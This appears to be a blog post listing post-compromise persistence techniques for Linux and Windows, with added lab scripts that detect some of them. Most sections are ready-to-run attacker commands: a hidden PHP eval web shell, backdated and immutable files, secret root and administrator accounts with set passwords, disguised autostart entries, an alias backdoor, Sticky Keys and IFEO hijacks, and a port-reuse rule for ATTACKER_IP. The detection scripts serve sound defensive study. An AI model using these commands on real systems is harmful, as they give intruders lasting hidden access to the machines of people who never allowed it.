Persistence


Hiding Files

Linux

  • Content hiding
# Payload, then a carriage return and 50 spaces: on a terminal, `cat`/`more` print the spaces over
# the shell, so the line looks blank. `cat -A`, `grep -c $'\r'` or any editor still shows it.
printf "<?=@eval(\$_REQUEST['code']);?>\r%-50s\n" > backup.php
  • File timestamps
# Copy index.php's timestamps, or set an explicit one (format [[CC]YY]MMDDhhmm[.ss]).
# touch rewrites atime/mtime only; ctime still records the change, so compare `stat` mtime with ctime.
touch -r index.php backup.php
touch -t 201406121017.34 backup.php
  • File locking
# Immutable flag: no delete, rename or write (even by root) until `chattr -i`; `lsattr` shows the "i" flag.
chattr +i backup.php
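As an added example (not part of the original post), the script below builds a scratch web root, plants a file with the CR-padding and backdating tricks above, and runs the checks a responder would use to expose them: a carriage-return search and an mtime/ctime comparison. It assumes a Linux box with GNU coreutils and grep; the lab directory and both PHP files are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: plant the CR-padding and
# backdating tricks in a throwaway directory, then expose them.
# Assumes GNU coreutils/grep (stat -c, cat -A, grep -r). Lab files are constructed.
set -u

make_lab() {
  local lab
  lab=$(mktemp -d)
  printf '<?php echo "index"; ?>\n' > "$lab/index.php"
  # Same layout as the post: payload, then CR and 50 spaces. On a terminal the
  # spaces overwrite the payload, so `cat backup.php` looks like a blank line.
  printf '<?=@eval($_REQUEST["code"]);?>\r%-50s\n' '' > "$lab/backup.php"
  # Backdate mtime the way the post does; ctime cannot be set with touch.
  touch -t 201406121017.34 "$lab/backup.php"
  echo "$lab"
}

# Files that contain a carriage return: `cat` hides whatever precedes it.
find_cr_hidden() {
  local cr
  cr=$(printf '\r')
  grep -rlF "$cr" "$1" | sort
}

# Files whose mtime is older than their ctime by more than 60 seconds.
# touch -r / touch -t rewrite mtime only, so a large gap is a timestomp hint.
find_timestomped() {
  local dir=$1 f m c
  for f in "$dir"/*; do
    set -- $(stat -c '%Y %Z' "$f")   # mtime ctime, epoch seconds
    m=$1; c=$2
    [ $((c - m)) -gt 60 ] && echo "$f"
  done
  return 0
}

# Make the hidden bytes visible: the CR shows up as ^M, end of line as $.
reveal() { cat -A "$1"; }

LAB=$(make_lab)
printf 'CR-hidden:   %s\n' "$(find_cr_hidden "$LAB")"
printf 'timestomped: %s\n' "$(find_timestomped "$LAB")"
reveal "$LAB/backup.php"
```

`touch -r`/`touch -t` rewrite only atime and mtime; the kernel sets ctime at the moment of the change and it cannot be backdated without raw disk writes or clock manipulation, which is why the mtime/ctime gap is the cheap check. The immutable flag from `chattr +i` is visible in `lsattr` output and is not covered by this script.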

Windows

  • File attributes
# system + archive + hidden + read-only; `dir /a` and `attrib` still list it
attrib +s +a +h +r D:\PHPStudy\WWW\backup.php
  • ADS hiding
#Since XP, a file stored in an alternate data stream can no longer be executed directly
#Streams do not show in a plain `dir`, but `dir /r` lists them
echo ^<?=@eval($_REQUEST['code']);?^> > index.php:mm
  • File timestamps
# PowerShell (ls = Get-ChildItem). This changes only the $STANDARD_INFORMATION timestamps;
# the $FILE_NAME timestamps in the MFT keep the real values, which forensic tools compare against.
(ls backup.php).CreationTime="2014-06-12 10:17:34"
(ls backup.php).LastWriteTime="2014-06-12 10:17:34"
(ls backup.php).LastAccessTime="2014-06-12 10:17:34"

User Management

Linux

  • Regular account
# /bin/nologin becomes a SUID copy of bash, so the account looks disabled but has a working shell.
# Note: bash drops the effective uid unless started with -p, so the SUID bit alone gives no root.
cp /bin/bash /bin/nologin && chmod u+s /bin/nologin
# Insert at line 17 of passwd/shadow so the entry sits among the system accounts;
# 18375 is the last-change field (days since 1970-01-01)
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • System account
# uid 0 and gid 0: a second root whose "nologin" shell is a link to bash
ln -s /bin/bash /bin/nologin
sed -i "3i\usr:x:0:0:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "3i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • Key-based login
# Password field "*": no password login, SSH key only. cap_setuid on the python binary lets the
# unprivileged account call setuid(0) after login (setcap is applied to the resolved file).
ln -s /bin/bash /bin/nologin && setcap cap_setuid+ep /bin/python
sed -i "17i\usr:x:40:40:usr:/var/local:/bin/nologin" /etc/passwd
sed -i "17i\usr:*:18375:0:99999:7:::" /etc/shadow
# sshd StrictModes rejects a home, .ssh or authorized_keys that is group- or world-writable;
# check the mode of /var/local and use chmod 700 .ssh / chmod 600 authorized_keys
mkdir /var/local/.ssh && echo "***" > /var/local/.ssh/authorized_keys
python -c "import os, pty; os.setuid(0); pty.spawn('/bin/bash')"
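As an added example (not part of the original post), this audit script checks a passwd/shadow pair for the three account variants above: an extra uid 0, a "nologin" shell that is really a link to bash with a usable password hash behind it, and a locked password paired with an authorized_keys file. The sample passwd and shadow lines, the hash placeholders and the lab tree are all constructed; on a real host run the functions against /etc/passwd and /etc/shadow as root with an empty prefix, and add `getcap -r / 2>/dev/null` to catch the cap_setuid variant.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: audit passwd/shadow for the
# hidden-account patterns above. The lab tree, sample entries and hash strings
# are constructed placeholders (the hashes are not crypt output of any password).
set -u

make_lab() {
  local lab
  lab=$(mktemp -d)
  mkdir -p "$lab/bin" "$lab/var/local/.ssh"
  ln -s /bin/sh "$lab/bin/nologin"            # the post's symlink/copy trick, pointed at a real shell
  echo "ssh-ed25519 AAAAC3-constructed-key comment" > "$lab/var/local/.ssh/authorized_keys"
  cat > "$lab/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
usr:x:0:0:usr:/usr/sbin:/bin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
svc:x:40:40:svc:/usr/sbin:/bin/nologin
keyusr:x:41:41:keyusr:/var/local:/bin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
  cat > "$lab/shadow" <<'EOF'
root:$1$c0nstruc$placeholderhashnotreal00:18375:0:99999:7:::
daemon:*:18375:0:99999:7:::
usr:$1$c0nstruc$placeholderhashnotreal01:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
svc:$1$c0nstruc$placeholderhashnotreal02:18375:0:99999:7:::
keyusr:*:18375:0:99999:7:::
alice:$1$c0nstruc$placeholderhashnotreal03:18375:0:99999:7:::
EOF
  echo "$lab"
}

# 1. Any uid 0 account that is not root.
find_extra_uid0() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# 2. Accounts whose shell looks like nologin/false but whose shadow entry holds
#    a usable hash (a genuine no-login account carries "*" or "!").
find_hash_behind_nologin() {
  awk -F: 'NR == FNR { if ($7 ~ /(nologin|false)$/) nl[$1] = 1; next }
           ($1 in nl) && $2 != "" && $2 !~ /^[*!]/ { print $1 }' "$1" "$2" | sort
}

# 3. Locked-password accounts that nevertheless have an authorized_keys file.
#    $3 is a path prefix so the lab tree can stand in for "/".
find_key_only() {
  local prefix=${3:-} user home
  awk -F: 'NR == FNR { home[$1] = $6; next }
           $2 ~ /^[*!]/ { print $1, home[$1] }' "$1" "$2" |
  while read -r user home; do
    if [ -s "$prefix$home/.ssh/authorized_keys" ]; then echo "$user"; fi
  done
}

# 4. Shells named nologin that resolve to something else (symlink or copy of a
#    real shell) or carry the setuid bit.
find_fake_nologin() {
  local prefix=${2:-} shell target
  awk -F: '$7 ~ /nologin$/ { print $7 }' "$1" | sort -u |
  while read -r shell; do
    [ -e "$prefix$shell" ] || continue
    target=$(readlink -f "$prefix$shell")
    if [ "$(basename "$target")" != nologin ] || [ -u "$target" ]; then echo "$shell"; fi
  done
}

LAB=$(make_lab)
echo "uid 0 but not root:   $(find_extra_uid0 "$LAB/passwd")"
echo "hash behind nologin:  $(find_hash_behind_nologin "$LAB/passwd" "$LAB/shadow" | tr '\n' ' ')"
echo "key-only accounts:    $(find_key_only "$LAB/passwd" "$LAB/shadow" "$LAB")"
echo "fake nologin shells:  $(find_fake_nologin "$LAB/passwd" "$LAB")"
```

Check 4 is the one that catches all three variants at once: every one of them depends on /bin/nologin not being the real nologin binary, and that is a single `readlink -f` away.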

Windows

  • Guest account
net user guest admin@888..
net user guest /active:yes
net localgroup administrators guest /add
  • VBS script
' Usage (script saved under any name, e.g. adduser.vbs): cscript //nologo adduser.vbs USERNAME PASSWORD
' Enables Guest (when USERNAME is "guest") or creates a new local user, sets the password
' and adds the account to the local Administrators group through ADSI (WinNT provider).
UserName = WScript.Arguments(0)
PassWord = WScript.Arguments(1)
WinNT = "WinNT://" & CreateObject("WScript.Network").ComputerName
Set Admin = GetObject(WinNT & "/Administrators,group")
If UCase(UserName) = "GUEST" Then
    Set User = GetObject(WinNT & "/Guest")
    User.AccountDisabled = False
Else
    Set User = GetObject(WinNT).Create("User", UserName)
End If
User.SetPassword PassWord
User.SetInfo
Admin.Add WinNT & "/" & UserName

Autostart

Linux

  • Startup scripts
/etc/bashrc
/etc/profile
/etc/profile.d/*
/etc/rc.d/init.d/*
/etc/rc.d/rc.local
  • Scheduled tasks
# Insert the entry before the last line of /etc/crontab. The CR plus 80 spaces hides it on screen;
# the "#" keeps the CR and padding out of the command, which cron hands to /bin/sh
# (not bash, so "> /dev/null 2>&1" is used instead of "&>").
sed -i "\$i\\$(printf '59 23 * * * root COMMAND > /dev/null 2>&1 #\r%-80s\n')" /etc/crontab
#/etc/cron.hourly -- hourly, /etc/cron.daily -- daily, /etc/cron.weekly -- weekly, /etc/cron.monthly -- monthly
# Files there are run by run-parts: give the script a shebang, mode 755, and a name without a dot
# (Debian's run-parts skips names containing one)
printf "#!/bin/sh\nCOMMAND > /dev/null 2>&1 #\r%-60s\n" > /etc/cron.daily/FILENAME && chmod 755 /etc/cron.daily/FILENAME

Windows

  • Registry
# Run: every logon. RunOnce: next logon only, then the value is deleted. HKCU needs no admin rights.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v KEYNAME /t REG_SZ /d "COMMAND" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v KEYNAME /t REG_SZ /d "COMMAND" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v KEYNAME /t REG_SZ /d "COMMAND" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v KEYNAME /t REG_SZ /d "COMMAND" /f
  • Logon scripts
# UserInitMprLogonScript is run by userinit.exe at logon. Shell and Userinit keep their original
# program first so the desktop still comes up.
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "PROGRAMPATH" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,COMMAND" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,COMMAND" /f
  • Startup folders
#Before NT6 (XP/2003)
C:\Documents and Settings\All Users\Start Menu\Programs\StartUp
C:\Documents and Settings\%UserName%\Start Menu\Programs\StartUp
#NT6 and later (Vista+)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • System service
# The space after each "=" is required by sc. A binary that is not a real service executable is
# killed by the Service Control Manager when the start timeout expires (error 1053), but it does run.
sc create SERVICENAME binPath= "COMMAND" start= "delayed-auto" obj= "LocalSystem"
sc description SERVICENAME "service description text"
  • Scheduled tasks
#onStart -- at system boot, onLogon -- at user logon
# Nesting the task under \Microsoft\Windows\ makes it blend in with the built-in tasks
schtasks /Create /tn "\Microsoft\Windows\TASKNAME\TASKNAME" /ru SYSTEM /sc onStart /tr "COMMAND"

Process Hijacking

Linux

  • alias backdoor
# Every time the user types pwd, COMMAND runs silently and then the real pwd runs. The "#" keeps
# the CR and the 80 spaces of padding (which hide the line on screen) out of the alias body;
# without it the CR becomes part of the alias and "pwd" stops working.
# Check with `type pwd` or `alias` in the affected shell.
printf "alias pwd='\$(COMMAND &> /dev/null)pwd' #\r%-80s\n" >> ~/.bashrc && source ~/.bashrc
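As an added example (not part of the original post), the script below writes the alias backdoor into a scratch rc file with a stand-in command (a `touch` of a marker file, constructed for the demo), shows that `pwd` still prints the right directory while the hidden command runs, and then shows the two checks that expose it: `type pwd` in a shell that loaded the file, and a grep for alias bodies containing `$(`.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: plant the alias backdoor in
# a scratch rc file, prove it works, and show how to spot it. The rc file,
# the marker file and the stand-in "command" (touch) are constructed.
set -u

make_rc() {
  local lab=$1
  # Same shape as the post's line. The "#" keeps the CR and the 80 spaces of
  # padding in a comment, so the alias body is exactly "$(...)pwd".
  printf "alias pwd='\$(touch %s/marker &> /dev/null)pwd' #\r%-80s\n" "$lab" '' > "$lab/bashrc"
  printf 'alias ll="ls -l"\n' >> "$lab/bashrc"          # an ordinary alias, for contrast
  echo "$lab/bashrc"
}

# Run `pwd` in a fresh bash that loads the rc file. Aliases expand only when
# expand_aliases is on (interactive shells set it), and only for commands read
# after the alias was defined, so each step sits on its own line.
run_pwd_with_rc() {
  bash -c 'shopt -s expand_aliases
source "$1"
pwd' _ "$1"
}

# The real definition behind `pwd` in a shell that loaded the rc file.
real_definition() {
  bash -c 'shopt -s expand_aliases
source "$1"
type pwd' _ "$1" | cat -v
}

# Alias lines whose body contains command substitution: the wrapped command
# still runs, but something else runs first. cat -v turns a hidden CR into ^M.
suspicious_aliases() {
  grep -nE '^[[:space:]]*alias [^=]+=.*\$\(' "$@" | cat -v
}

LAB=$(mktemp -d)
RC=$(make_rc "$LAB")
echo "pwd output:     $(cd "$LAB" && run_pwd_with_rc "$RC")"
echo "marker dropped: $([ -f "$LAB/marker" ] && echo yes || echo no)"
real_definition "$RC"
suspicious_aliases "$RC"
```

`type pwd` is the definitive check because it reports what the current shell will actually run; the grep is for sweeping rc files (~/.bashrc, /etc/bashrc, /etc/profile.d/*) on a host you cannot log into interactively.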

Windows

  • DLL hijacking

  • File replacement
# Sticky Keys: pressing Shift five times at the logon screen starts sethc.exe as SYSTEM, so the
# program copied over it gets a SYSTEM session before anyone logs on.
# cacls is deprecated; `icacls C:\Windows\System32\sethc.exe /grant Everyone:F` is the equivalent.
takeown /A /F C:\Windows\System32\sethc.exe
cacls C:\Windows\System32\sethc.exe /E /G Everyone:F
cd C:\Windows\System32 && move sethc.exe sethc.bak && copy odbcad32.exe sethc.exe
  • Image File Execution Options
#Triggered directly: the Debugger value is started in place of sethc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\odbcad32.exe" /f
#Silent process exit: MonitorProcess runs when sethc.exe exits; GlobalFlag 512 (0x200) is FLG_MONITOR_SILENT_PROCESS_EXIT
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "COMMAND" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f

Port Reuse

Linux

  • iptables
# Only traffic from ATTACKER_IP to port 80 is rewritten to the SSH port of the same server;
# every other client still reaches the web service. `-j REDIRECT --to-ports 22` does the same
# without naming the server address. Check with `iptables -t nat -L PREROUTING -n --line-numbers`.
#ATTACKER_IP --> Server:80 --> Server:22
iptables -t nat -A PREROUTING -p tcp -s ATTACKER_IP --dport 80 -j DNAT --to-destination SERVER_IP:22
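As an added example (not part of the original post), the function below picks out rules of the kind shown above from `iptables-save` output, and also catches the `REDIRECT --to-ports 22` form. The nat table dump is constructed for the demo; on a real host pipe `iptables-save -t nat` (as root) into the function.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: flag PREROUTING DNAT/REDIRECT
# rules that match the port-reuse pattern above. SAMPLE_NAT is a constructed
# iptables-save dump with one ordinary forward and one port-reuse rule.
set -u

SAMPLE_NAT=$(cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 8080 -j DNAT --to-destination 10.0.0.5:80
-A PREROUTING -s 203.0.113.7/32 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.2:22
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
EOF
)

# Reads iptables-save text on stdin. For every PREROUTING rule that jumps to
# DNAT or REDIRECT, report (a) a single-host source filter and/or (b) a target
# of port 22. Output: "reason<TAB>rule". iptables-save always prints a
# single-host -s as /32 and puts the target arguments last on the line.
suspicious_nat_rules() {
  awk '
    /^-A PREROUTING/ && /-j (DNAT|REDIRECT)/ {
      reason = ""
      if ($0 ~ /-s [0-9.]+\/32/) reason = reason "single-source "
      if ($0 ~ /--to-destination [0-9.]+:22$/ || $0 ~ /--to-ports 22$/) reason = reason "to-ssh "
      if (reason != "") print reason "\t" $0
    }'
}

# Live host wrapper (needs root); not exercised by the demo below.
audit_live() { iptables-save -t nat | suspicious_nat_rules; }

printf '%s\n' "$SAMPLE_NAT" | suspicious_nat_rules
```

A legitimate DNAT almost never carries a `-s host/32` match; a rule that combines a single source with a jump to the SSH port is the signature of this technique, and the same awk can be pointed at `nft list ruleset` output with the regexes adjusted.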

Windows

  • WinRM
#Start WinRM
winrm quickconfig -q
#Enable port reuse: the compatibility listener adds port 80 next to 5985; http.sys shares port 80 with IIS by URL prefix (/wsman)
winrm set winrm/config/Service @{EnableCompatibilityHttpListener="true"}
#Change the listener port
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
#On the connecting machine: trust every host (a client-side setting, not needed on the server)
winrm set winrm/config/Client @{TrustedHosts="*"}

Author: DongHuangT1
License: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC 4.0. Please credit DongHuangT1 when reposting.